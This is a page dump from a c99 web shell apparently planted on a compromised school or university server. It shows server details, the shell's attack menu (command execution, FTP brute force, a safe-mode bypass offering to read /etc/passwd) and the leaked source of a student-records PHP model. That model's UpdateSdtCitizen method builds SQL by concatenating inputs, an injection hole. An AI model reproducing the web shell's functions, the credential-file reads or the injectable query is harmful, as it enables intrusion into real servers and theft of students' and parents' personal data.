!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/models/eregis/   drwxr-xr-x
Free 52 GB of 127.8 GB (40.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     da_rg_StudentDetails.php (11.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

include_once("my_model.php");

class 
Da_rg_studentdetails extends My_model {        
    
    
// PK is sdtStdId
    
    
public $sdtStdId;
    public 
$sdtOldName;
    public 
$sdtSex;
    public 
$sdtCitizenId;
    public 
$sdtBirthDate;
    public 
$sdtBloodGroup;
    public 
$sdtCardExpireDate;
    public 
$sdtEmail;
    public 
$sdtWeight;
    public 
$sdtHeight;
    public 
$sdtPicturePath;
    public 
$sdtCanRefund;
    public 
$sdtOccExamResult;
    public 
$sdtHomeAddr;
    public 
$sdtHomePostCode;
    public 
$sdtHomePhoneNo;
    public 
$sdtCurrentAddr;
    public 
$sdtCurrentPostCode;
    public 
$sdtCurrentPhoneNo;
    public 
$sdtWorkName;
    public 
$sdtWorkAddr;
    public 
$sdtWorkPostCode;
    public 
$sdtWorkPhoneNo;
    public 
$sdtWorkPosition;
    public 
$sdtWorkSalary;
    public 
$sdtWorkStatus;
    public 
$sdtFatherName;
    public 
$sdtFatherSurname;
    public 
$sdtFatherAddr;
    public 
$sdtFatherPostCode;
    public 
$sdtFatherPhoneNo;
    public 
$sdtFatherOccupation;
    public 
$sdtFatherStatus;
    public 
$sdtMotherName;
    public 
$sdtMotherSurname;
    public 
$sdtMotherAddr;
    public 
$sdtMotherPostCode;
    public 
$sdtMotherPhoneNo;
    public 
$sdtMotherOccupation;
    public 
$sdtMotherStatus;
    public 
$sdtParentName;
    public 
$sdtParentSurname;
    public 
$sdtParentRelationship;
    public 
$sdtParentAddr;
    public 
$sdtParentPostCode;
    public 
$sdtParentPhoneNo;
    public 
$sdtParentMobileNo;
    public 
$sdtParentEmail;
    public 
$sdtParentOccupation;
    public 
$sdtParentIncome;
    public 
$sdtContactName;
    public 
$sdtContactAddr;
    public 
$sdtContactPostCode;
    public 
$sdtContactPhoneNo;
    public 
$sdtGraduateAddr;
    public 
$sdtGraduatePostCode;
    public 
$sdtGraduatePhoneNo;
    public 
$sdtPrvIdBirth;
    public 
$sdtCntId;
    public 
$sdtNtId;
    public 
$sdtRlgId;
    public 
$sdtMsId;
    public 
$sdtRtId;
    public 
$sdtHpId;
    public 
$sdtPfIdParent;
    public 
$sdtDtIdHome;
    public 
$sdtApIdHome;
    public 
$sdtPrvIdHome;
    public 
$sdtDtIdCurrent;
    public 
$sdtApIdCurrent;
    public 
$sdtPrvIdCurrent;
    public 
$sdtDtIdWork;
    public 
$sdtApIdWork;
    public 
$sdtPrvIdWork;
    public 
$sdtDtIdFather;
    public 
$sdtApIdFather;
    public 
$sdtPrvIdFather;
    public 
$sdtDtIdMother;
    public 
$sdtApIdMother;
    public 
$sdtPrvIdMother;
    public 
$sdtDtIdParent;
    public 
$sdtApIdParent;
    public 
$sdtPrvIdParent;
    public 
$sdtDtIdContact;
    public 
$sdtApIdContact;
    public 
$sdtPrvIdContact;
    public 
$sdtDtIdGraduate;
    public 
$sdtApIdGraduate;
    public 
$sdtPrvIdGraduate;
    public 
$sdtEdgIdPre;

    public 
$last_insert_id;

    function 
Da_rg_StudentDetails() {
        
parent::__construct();
        
$this->load->database('rg'TRUE);
    }
    
    function 
insert() {
        
// if there is no auto_increment field, please remove it
        
$sql "INSERT INTO $this->rg_dbname.rg_StudentDetails (sdtStdId, sdtOldName, sdtSex, sdtCitizenId, sdtBirthDate, sdtBloodGroup, sdtCardExpireDate, sdtEmail, sdtWeight, sdtHeight, sdtPicturePath, sdtCanRefund, sdtOccExamResult, sdtHomeAddr, sdtHomePostCode, sdtHomePhoneNo, sdtCurrentAddr, sdtCurrentPostCode, sdtCurrentPhoneNo, sdtWorkName, sdtWorkAddr, sdtWorkPostCode, sdtWorkPhoneNo, sdtWorkPosition, sdtWorkSalary, sdtWorkStatus, sdtFatherName, sdtFatherSurname, sdtFatherAddr, sdtFatherPostCode, sdtFatherPhoneNo, sdtFatherOccupation, sdtFatherStatus, sdtMotherName, sdtMotherSurname, sdtMotherAddr, sdtMotherPostCode, sdtMotherPhoneNo, sdtMotherOccupation, sdtMotherStatus, sdtParentName, sdtParentSurname, sdtParentRelationship, sdtParentAddr, sdtParentPostCode, sdtParentPhoneNo, sdtParentMobileNo, sdtParentEmail, sdtParentOccupation, sdtParentIncome, sdtContactName, sdtContactAddr, sdtContactPostCode, sdtContactPhoneNo, sdtGraduateAddr, sdtGraduatePostCode, sdtGraduatePhoneNo, sdtPrvIdBirth, sdtCntId, sdtNtId, sdtRlgId, sdtMsId, sdtRtId, sdtHpId, sdtPfIdParent, sdtDtIdHome, sdtApIdHome, sdtPrvIdHome, sdtDtIdCurrent, sdtApIdCurrent, sdtPrvIdCurrent, sdtDtIdWork, sdtApIdWork, sdtPrvIdWork, sdtDtIdFather, sdtApIdFather, sdtPrvIdFather, sdtDtIdMother, sdtApIdMother, sdtPrvIdMother, sdtDtIdParent, sdtApIdParent, sdtPrvIdParent, sdtDtIdContact, sdtApIdContact, sdtPrvIdContact, sdtDtIdGraduate, sdtApIdGraduate, sdtPrvIdGraduate, sdtEdgIdPre)
                VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)"
;
        
$this->db->query($sql, array($this->sdtStdId$this->sdtOldName$this->sdtSex$this->sdtCitizenId$this->sdtBirthDate$this->sdtBloodGroup$this->sdtCardExpireDate$this->sdtEmail$this->sdtWeight$this->sdtHeight$this->sdtPicturePath$this->sdtCanRefund$this->sdtOccExamResult$this->sdtHomeAddr$this->sdtHomePostCode$this->sdtHomePhoneNo$this->sdtCurrentAddr$this->sdtCurrentPostCode$this->sdtCurrentPhoneNo$this->sdtWorkName$this->sdtWorkAddr$this->sdtWorkPostCode$this->sdtWorkPhoneNo$this->sdtWorkPosition$this->sdtWorkSalary$this->sdtWorkStatus$this->sdtFatherName$this->sdtFatherSurname$this->sdtFatherAddr$this->sdtFatherPostCode$this->sdtFatherPhoneNo$this->sdtFatherOccupation$this->sdtFatherStatus$this->sdtMotherName$this->sdtMotherSurname$this->sdtMotherAddr$this->sdtMotherPostCode$this->sdtMotherPhoneNo$this->sdtMotherOccupation$this->sdtMotherStatus$this->sdtParentName$this->sdtParentSurname$this->sdtParentRelationship$this->sdtParentAddr$this->sdtParentPostCode$this->sdtParentPhoneNo$this->sdtParentMobileNo$this->sdtParentEmail$this->sdtParentOccupation$this->sdtParentIncome$this->sdtContactName$this->sdtContactAddr$this->sdtContactPostCode$this->sdtContactPhoneNo$this->sdtGraduateAddr$this->sdtGraduatePostCode$this->sdtGraduatePhoneNo$this->sdtPrvIdBirth$this->sdtCntId$this->sdtNtId$this->sdtRlgId$this->sdtMsId$this->sdtRtId$this->sdtHpId$this->sdtPfIdParent$this->sdtDtIdHome$this->sdtApIdHome$this->sdtPrvIdHome$this->sdtDtIdCurrent$this->sdtApIdCurrent$this->sdtPrvIdCurrent$this->sdtDtIdWork$this->sdtApIdWork$this->sdtPrvIdWork$this->sdtDtIdFather$this->sdtApIdFather$this->sdtPrvIdFather$this->sdtDtIdMother$this->sdtApIdMother$this->sdtPrvIdMother$this->sdtDtIdParent$this->sdtApIdParent$this->sdtPrvIdParent$this->sdtDtIdContact$this->sdtApIdContact$this->sdtPrvIdContact$this->sdtDtIdGraduate$this->sdtApIdGraduate$this->sdtPrvIdGraduate$this->sdtEdgIdPre));
        
$this->last_insert_id $this->db->insert_id();
    }
    
    function 
update() {
        
// if there is no primary key, please remove WHERE clause.
        
$sql "UPDATE $this->rg_dbname.rg_StudentDetails 
                SET    sdtOldName=?, sdtSex=?, sdtCitizenId=?, sdtBirthDate=?, sdtBloodGroup=?, sdtCardExpireDate=?, sdtEmail=?, sdtWeight=?, sdtHeight=?, sdtPicturePath=?, sdtCanRefund=?, sdtOccExamResult=?, sdtHomeAddr=?, sdtHomePostCode=?, sdtHomePhoneNo=?, sdtCurrentAddr=?, sdtCurrentPostCode=?, sdtCurrentPhoneNo=?, sdtWorkName=?, sdtWorkAddr=?, sdtWorkPostCode=?, sdtWorkPhoneNo=?, sdtWorkPosition=?, sdtWorkSalary=?, sdtWorkStatus=?, sdtFatherName=?, sdtFatherSurname=?, sdtFatherAddr=?, sdtFatherPostCode=?, sdtFatherPhoneNo=?, sdtFatherOccupation=?, sdtFatherStatus=?, sdtMotherName=?, sdtMotherSurname=?, sdtMotherAddr=?, sdtMotherPostCode=?, sdtMotherPhoneNo=?, sdtMotherOccupation=?, sdtMotherStatus=?, sdtParentName=?, sdtParentSurname=?, sdtParentRelationship=?, sdtParentAddr=?, sdtParentPostCode=?, sdtParentPhoneNo=?, sdtParentMobileNo=?, sdtParentEmail=?, sdtParentOccupation=?, sdtParentIncome=?, sdtContactName=?, sdtContactAddr=?, sdtContactPostCode=?, sdtContactPhoneNo=?, sdtGraduateAddr=?, sdtGraduatePostCode=?, sdtGraduatePhoneNo=?, sdtPrvIdBirth=?, sdtCntId=?, sdtNtId=?, sdtRlgId=?, sdtMsId=?, sdtRtId=?, sdtHpId=?, sdtPfIdParent=?, sdtDtIdHome=?, sdtApIdHome=?, sdtPrvIdHome=?, sdtDtIdCurrent=?, sdtApIdCurrent=?, sdtPrvIdCurrent=?, sdtDtIdWork=?, sdtApIdWork=?, sdtPrvIdWork=?, sdtDtIdFather=?, sdtApIdFather=?, sdtPrvIdFather=?, sdtDtIdMother=?, sdtApIdMother=?, sdtPrvIdMother=?, sdtDtIdParent=?, sdtApIdParent=?, sdtPrvIdParent=?, sdtDtIdContact=?, sdtApIdContact=?, sdtPrvIdContact=?, sdtDtIdGraduate=?, sdtApIdGraduate=?, sdtPrvIdGraduate=?, sdtEdgIdPre=? 
                WHERE sdtStdId=?"
;    
        
$this->db->query($sql, array($this->sdtOldName$this->sdtSex$this->sdtCitizenId$this->sdtBirthDate$this->sdtBloodGroup$this->sdtCardExpireDate$this->sdtEmail$this->sdtWeight$this->sdtHeight$this->sdtPicturePath$this->sdtCanRefund$this->sdtOccExamResult$this->sdtHomeAddr$this->sdtHomePostCode$this->sdtHomePhoneNo$this->sdtCurrentAddr$this->sdtCurrentPostCode$this->sdtCurrentPhoneNo$this->sdtWorkName$this->sdtWorkAddr$this->sdtWorkPostCode$this->sdtWorkPhoneNo$this->sdtWorkPosition$this->sdtWorkSalary$this->sdtWorkStatus$this->sdtFatherName$this->sdtFatherSurname$this->sdtFatherAddr$this->sdtFatherPostCode$this->sdtFatherPhoneNo$this->sdtFatherOccupation$this->sdtFatherStatus$this->sdtMotherName$this->sdtMotherSurname$this->sdtMotherAddr$this->sdtMotherPostCode$this->sdtMotherPhoneNo$this->sdtMotherOccupation$this->sdtMotherStatus$this->sdtParentName$this->sdtParentSurname$this->sdtParentRelationship$this->sdtParentAddr$this->sdtParentPostCode$this->sdtParentPhoneNo$this->sdtParentMobileNo$this->sdtParentEmail$this->sdtParentOccupation$this->sdtParentIncome$this->sdtContactName$this->sdtContactAddr$this->sdtContactPostCode$this->sdtContactPhoneNo$this->sdtGraduateAddr$this->sdtGraduatePostCode$this->sdtGraduatePhoneNo$this->sdtPrvIdBirth$this->sdtCntId$this->sdtNtId$this->sdtRlgId$this->sdtMsId$this->sdtRtId$this->sdtHpId$this->sdtPfIdParent$this->sdtDtIdHome$this->sdtApIdHome$this->sdtPrvIdHome$this->sdtDtIdCurrent$this->sdtApIdCurrent$this->sdtPrvIdCurrent$this->sdtDtIdWork$this->sdtApIdWork$this->sdtPrvIdWork$this->sdtDtIdFather$this->sdtApIdFather$this->sdtPrvIdFather$this->sdtDtIdMother$this->sdtApIdMother$this->sdtPrvIdMother$this->sdtDtIdParent$this->sdtApIdParent$this->sdtPrvIdParent$this->sdtDtIdContact$this->sdtApIdContact$this->sdtPrvIdContact$this->sdtDtIdGraduate$this->sdtApIdGraduate$this->sdtPrvIdGraduate$this->sdtEdgIdPre$this->sdtStdId));    
    }
    
    function 
delete() {
        
// if there is no primary key, please remove WHERE clause.
        
$sql "DELETE FROM $this->rg_dbname.rg_StudentDetails
                WHERE sdtStdId=?"
;
        
$this->db->query($sql, array($this->sdtStdId));
    }
    
    
/*
     * You have to assign primary key value before call this function.
     */
    
function get_by_key($withSetAttributeValue=FALSE) {    
        
$sql "SELECT * 
                FROM $this->rg_dbname.rg_StudentDetails 
                WHERE sdtStdId=?"
;
        
$query $this->db->query($sql, array($this->sdtStdId));
        if ( 
$withSetAttributeValue ) {
            
$this->row2attribute$query->row() );
        } else {
            return 
$query ;
        }
    }

    function 
last_insert_id() {
        return 
$this->db->insert_id();
    }

    public function 
UpdateSdtCitizen($sdtStdId,$app_idcard){
        
$sql "UPDATE $this->rg_dbname.`rg_StudentDetails` SET `sdtCitizenId` = $app_idcard WHERE `sdtStdId` = ".$sdtStdId;
        
$this->db->query($sql);
        return 
$this->db->query($sql);
    }
}     
//=== end class Da_rg_studentdetails
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.008 ]--